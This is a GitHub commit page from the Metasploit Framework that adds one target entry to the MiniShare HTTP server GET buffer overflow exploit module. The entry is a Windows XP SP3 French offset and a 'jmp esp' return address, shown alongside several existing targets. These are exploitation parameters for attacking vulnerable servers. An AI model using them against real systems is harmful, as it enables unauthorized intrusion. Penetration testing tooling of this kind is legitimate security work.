Skip to content

Commit ccc0e55

Browse files
committed
Land rapid7#6116, target for minishare_get_overflow
2 parents 70b005d + e188bce commit ccc0e55

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

modules/exploits/windows/http/minishare_get_overflow.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -52,6 +52,7 @@ def initialize(info = {})
5252
['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
5353
['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
5454
['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
55+
['Windows XP SP3 French', { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp
5556
],
5657
'DefaultOptions' =>
5758
{

0 commit comments

Comments
 (0)